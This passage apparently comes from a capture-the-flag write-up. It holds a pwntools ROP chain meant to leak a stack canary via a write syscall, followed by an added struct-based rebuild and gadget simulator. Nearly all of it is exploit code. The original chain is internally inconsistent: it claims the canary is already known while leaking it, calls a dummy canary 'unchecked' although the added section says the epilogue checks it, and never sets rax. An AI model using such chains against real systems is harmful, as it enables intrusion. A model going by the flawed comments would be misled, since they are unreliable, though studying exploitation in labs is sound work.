
Now that we know the canary, we can craft a second payload that loads the arguments for write(1, canary_addr, 8) with pop gadgets, fires a syscall gadget, and then returns to main so the program keeps running:

```python
from pwn import *   # p64; offset, the gadget addresses, canary_addr and elf are defined earlier (not shown here)

payload  = b'A' * offset                 # fill the buffer up to the canary slot
payload += b'B' * 8                      # dummy canary (won't be checked yet)
payload += b'C' * 8                      # fake saved RBP
payload += p64(pop_rdi)
payload += p64(1)                        # fd = stdout
payload += p64(pop_rsi)                  # pop rsi ; pop r15 ; ret
payload += p64(canary_addr)              # buf = address of the canary
payload += p64(0xdeadbeef)               # filler for r15
payload += p64(pop_rdx)
payload += p64(8)                        # size = 8 bytes
payload += p64(syscall)                  # perform write(1, canary_addr, 8)
payload += p64(elf.symbols['main'])      # loop back to start
```
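To check a chain like this before firing it, the following added example (my code, not the writeup's) builds the same layout with plain `struct` instead of pwntools and walks it with a minimal gadget simulator. It shows how each `pop` consumes one stack slot (which is why the `pop rsi ; pop r15` gadget needs the 0xdeadbeef filler), what the register state is when the `syscall` gadget runs, and which value has to sit in the canary slot for the function epilogue to let the chain run at all. Every address, the offset and the canary value are hypothetical placeholders, not values from the page. One thing the walk makes visible: the chain never loads rax, so `syscall` dispatches on whatever the previous libc call left there, which must already be 1 (SYS_write) for this to be a write.

```python
"""Added example: build the write(1, canary_addr, 8) ROP chain without pwntools and
simulate it. All addresses below are hypothetical; the real ones come from the binary."""
import struct


def p64(x):
    return struct.pack("<Q", x)


def u64(b):
    return struct.unpack("<Q", b)[0]


# Hypothetical gadget/symbol addresses and layout (assumed, not from the page)
OFFSET      = 40              # bytes from buffer start to the canary slot
POP_RDI     = 0x401203        # pop rdi ; ret
POP_RSI_R15 = 0x401201        # pop rsi ; pop r15 ; ret  (the usual __libc_csu_init pair)
POP_RDX     = 0x40117e        # pop rdx ; ret
SYSCALL     = 0x40118c        # syscall ; ret
MAIN        = 0x401156        # elf.symbols['main']
CANARY_ADDR = 0x7ffd1a2b3c08  # stack address holding the canary (hypothetical)

# Registers each gadget pops before its ret; the syscall gadget pops nothing
GADGETS = {POP_RDI: ["rdi"], POP_RSI_R15: ["rsi", "r15"], POP_RDX: ["rdx"], SYSCALL: []}


def build_payload(canary=b"B" * 8):
    """Same layout as the chain above; `canary` is the value left in the canary slot."""
    chain = [POP_RDI, 1, POP_RSI_R15, CANARY_ADDR, 0xdeadbeef, POP_RDX, 8, SYSCALL, MAIN]
    return b"A" * OFFSET + canary + b"C" * 8 + b"".join(p64(x) for x in chain)


def canary_check_passes(payload, real_canary):
    """The epilogue compares the slot at OFFSET with the real canary before ret;
    the chain only runs if this returns True."""
    return payload[OFFSET:OFFSET + 8] == real_canary


def simulate(payload):
    """Walk the chain starting at the saved-rip slot and record every syscall reached.
    Returns the syscalls as (rax, rdi, rsi, rdx) tuples plus the final register state."""
    regs = {"rax": None, "rdi": None, "rsi": None, "rdx": None, "r15": None}
    sp = OFFSET + 8 + 8                     # skip the canary and the saved rbp
    syscalls = []
    while sp + 8 <= len(payload):
        rip = u64(payload[sp:sp + 8])
        sp += 8
        if rip == MAIN:                     # chain hands control back to main
            return {"syscalls": syscalls, "resumed_at": "main", "regs": regs}
        pops = GADGETS[rip]                 # KeyError means the chain jumps somewhere unknown
        for reg in pops:                    # each pop eats the next 8-byte slot
            regs[reg] = u64(payload[sp:sp + 8])
            sp += 8
        if rip == SYSCALL:
            # rax selects the syscall number and this chain never sets it, so it is
            # whatever the last libc call left behind; it must be 1 (SYS_write) here.
            syscalls.append((regs["rax"], regs["rdi"], regs["rsi"], regs["rdx"]))
    return {"syscalls": syscalls, "resumed_at": None, "regs": regs}


if __name__ == "__main__":
    result = simulate(build_payload())
    for rax, rdi, rsi, rdx in result["syscalls"]:
        print(f"syscall rax={rax} rdi={rdi} rsi={rsi:#x} rdx={rdx}")
    print("resumes at:", result["resumed_at"])
```

Passing the real canary to `build_payload(canary=...)` instead of the `B` filler is what makes `canary_check_passes` succeed; the simulator itself does not enforce the check, it only reports what the chain would do once the epilogue returns into it.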
